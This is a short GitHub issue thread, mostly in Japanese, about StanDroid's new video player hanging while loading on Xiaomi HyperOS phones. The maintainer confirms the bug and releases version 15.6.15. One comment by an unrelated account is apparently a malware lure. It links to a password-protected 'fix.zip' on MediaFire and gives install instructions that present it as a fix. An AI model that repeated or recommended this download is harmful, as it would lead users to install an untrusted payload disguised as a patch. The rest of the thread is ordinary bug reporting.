### ISSUE TITLE
Xiaomi HyperOS上で新プレイヤーが動作しない

### ISSUE THREAD

**Issue by 2tx** [kusamaru/StanDroid#10]
Xiaomi HyperOS搭載端末で新プレイヤーの動画読み込みが正常に行われません。
読み込み中の回転マークが出たまま先に進みません。
確認した端末/OS Ver./Android Ver.は

Xiaomi 11T Pro 日本版 / 1.0.3.0.UKDJPXM / 14 UKQ1.231207.002
POCO F6 Pro グローバル版 / 1.0.6.0.UNKMIXM / 14 UKQ1.230804.001

になります。
中華カスタムOSなのでおま環と言われたらそれまでなのですが…。

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kusamaru** [comment]
確認したところ、こちらの環境でも同様の問題が発生していました。
修正版15.6.15をリリースしましたので更新をお願いします。
